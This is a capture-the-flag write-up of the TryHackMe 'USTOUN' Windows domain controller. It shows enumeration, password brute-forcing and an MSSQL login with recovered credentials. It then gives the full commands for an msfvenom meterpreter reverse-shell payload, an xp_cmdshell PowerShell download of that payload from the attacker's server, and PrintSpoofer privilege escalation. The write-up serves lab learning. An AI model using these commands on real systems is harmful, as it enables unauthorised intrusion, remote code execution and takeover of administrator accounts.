TryHackMe – USTOUN writeup
Apr 11·6 min read
This is a writeup of USTOUN TryhackMe machine
First I run basic nmap scan to find open ports and the result is:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021–04–03 06:37:08Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ustoun.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?cat
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ustoun.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
and that it is Windows machine.
Then i enumerate ldap with nmap with this following command:
nmap -n -sV — script “ldap* and not brute” 10.10.27.42 #Using anonymous credentials
and the result is:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021–04–03 06:21:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ustoun.local, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=ustoun,DC=local
| ldapServiceName: ustoun.local:dc$@USTOUN.LOCAL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=ustoun,DC=local
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=ustoun,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=ustoun,DC=local
| namingContexts: DC=ustoun,DC=local
| namingContexts: CN=Configuration,DC=ustoun,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=ustoun,DC=local
| namingContexts: DC=DomainDnsZones,DC=ustoun,DC=local
| namingContexts: DC=ForestDnsZones,DC=ustoun,DC=local
| isSynchronized: TRUE
| highestCommittedUSN: 114734
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=ustoun,DC=local
| dnsHostName: DC.ustoun.local
| defaultNamingContext: DC=ustoun,DC=local
| currentTime: 20210403062120.0Z
|_ configurationNamingContext: CN=Configuration,DC=ustoun,DC=local
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ustoun.local, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=ustoun,DC=local
| ldapServiceName: ustoun.local:dc$@USTOUN.LOCAL
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=ustoun,DC=local
| serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=ustoun,DC=local
| schemaNamingContext: CN=Schema,CN=Configuration,DC=ustoun,DC=local
| namingContexts: DC=ustoun,DC=local
| namingContexts: CN=Configuration,DC=ustoun,DC=local
| namingContexts: CN=Schema,CN=Configuration,DC=ustoun,DC=local
| namingContexts: DC=DomainDnsZones,DC=ustoun,DC=local
| namingContexts: DC=ForestDnsZones,DC=ustoun,DC=local
| isSynchronized: TRUE
| highestCommittedUSN: 114734
| dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=ustoun,DC=local
| dnsHostName: DC.ustoun.local
| defaultNamingContext: DC=ustoun,DC=local
| currentTime: 20210403062120.0Z
|_ configurationNamingContext: CN=Configuration,DC=ustoun,DC=local
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
From here we can see that the domain is “ustoun.local”. So I put “10.10.27.42 ustoun.local” in my /etc/hosts file.
After, i try to enumerate kerberos with nmap using this command:
nmap -p 88 — script=krb5-enum-users — script-args krb5-enum-users.realm=’ustoun.local’,userdb=/usr/share/seclists/Usernames/cirt-default-usernames.txt 10.10.27.42
It returns some kerberos users:
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| ADMINISTRATOR@ustoun.local
| Administrator@ustoun.local
| administrator@ustoun.local
| Guest@ustoun.local
| GUEST@ustoun.local
|_ guest@ustoun.local
Later I enumerate “smb” too:
smbclient -L \\\\10.10.27.42
Results:
Sharename Type Comment
— — — — — — — — — — –
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
I can’t connect to this shares without password.
Using users found before (administrator, guest) I try to get LDAP password with “hydra”:
hydra -l administrator -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt 10.10.11.77 ldap2 -V -I -f
and:
hydra -l administrator -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt 10.10.11.77 ldap3 -V -I -f
But nothing.
Now I try to use impacket:
python3 lookupsid.py guest@10.10.11.77
It give me:
[*] Brute forcing SIDs at 10.10.11.77
[*] StringBinding ncacn_np:10.10.11.77[\pipe\lsarpc]
[*] Domain SID is: S-1–5–21–1901093607–1666369868–1126869414
498: DC01\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DC01\Administrator (SidTypeUser)
501: DC01\Guest (SidTypeUser)
502: DC01\krbtgt (SidTypeUser)
512: DC01\Domain Admins (SidTypeGroup)
513: DC01\Domain Users (SidTypeGroup)
514: DC01\Domain Guests (SidTypeGroup)
515: DC01\Domain Computers (SidTypeGroup)
516: DC01\Domain Controllers (SidTypeGroup)
517: DC01\Cert Publishers (SidTypeAlias)
518: DC01\Schema Admins (SidTypeGroup)
519: DC01\Enterprise Admins (SidTypeGroup)
520: DC01\Group Policy Creator Owners (SidTypeGroup)
521: DC01\Read-only Domain Controllers (SidTypeGroup)
522: DC01\Cloneable Domain Controllers (SidTypeGroup)
525: DC01\Protected Users (SidTypeGroup)
526: DC01\Key Admins (SidTypeGroup)
527: DC01\Enterprise Key Admins (SidTypeGroup)
553: DC01\RAS and IAS Servers (SidTypeAlias)
571: DC01\Allowed RODC Password Replication Group (SidTypeAlias)
572: DC01\Denied RODC Password Replication Group (SidTypeAlias)
1000: DC01\DC$ (SidTypeUser)
1101: DC01\DnsAdmins (SidTypeAlias)
1102: DC01\DnsUpdateProxy (SidTypeGroup)
1112: DC01\SVC-Kerb (SidTypeUser)
1114: DC01\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
Another 3 users:
krbtgt
SVC-Kerb
DC$
Trying with auxiliary/scanner/smb/smb_login metasploit module I found credentials:
SVC-Kerb:superman
I can’t access in previous shares with these credentials, then I tried to login to MSSQL using them:
python3 mssqlclient.py SVC-Kerb@10.10.106.177
I had access to MSSQL:
Impacket v0.9.22 — Copyright 2020 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC): Line 1: Changed database context to ‘master’.
[*] INFO(DC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 — Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
And now I can do mssql queries… specifically I can run xp_cmdshell function. With this function I created a folder (C:\prv) in which I put (with powershell) my .exe payload created with msfvenom. Then I ran exploit/multi/handler as listener to gain a meterpreter shell:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.28.132 LPORT=4444 -f exe > exploit.exe
# python3 -m http.server 8888
SQL> EXEC xp_cmdshell ‘mkdir C:\prv’
SQL> EXEC xp_cmdshell ‘powershell.exe -c curl http://10.11.28.132:8888/exploit.exe -o C:\prv\exploit.exe’
Then I activate multi handler listener and run my malicious payload from MSSQL.
SQL> EXEC xp_cmdshell ‘C:\prv\exploit.exe’
So I got meterpreter shell and from here I saw that the actual user was dc01\svc-kerb, but I can’t “type” user flag (access denied).
Now, for privilege escalation, I ran “shell” command into meterpreter and from here i ran “whoami /priv” and the results was that there was SeImpersonatePrivilege enabled.
Googling for this thing, I found that there are some .exe files for privilege escalation: juicy-potato, RogueWinRM, SweetPotato and PrintSpoofer. I’ve tried them all but only one of them (PrintSpoofer.exe) works properly. I downloaded it to victim using powershell.
First, from meterpreter, I ran “shell” command:
meterpreter> shell
Then download malicious file in victim machine:
powershell.exe -c curl http://10.11.28.132:8888/PrintSpoofer.exe -o C:\prv\PrintSpoofer.exe
And, executing it as following:
PrintSpoofer.exe -i -c cmd
I got root shell and both user/root flags.
I liked a lot this machine and thanks to it I learned about “Print Spoofer”.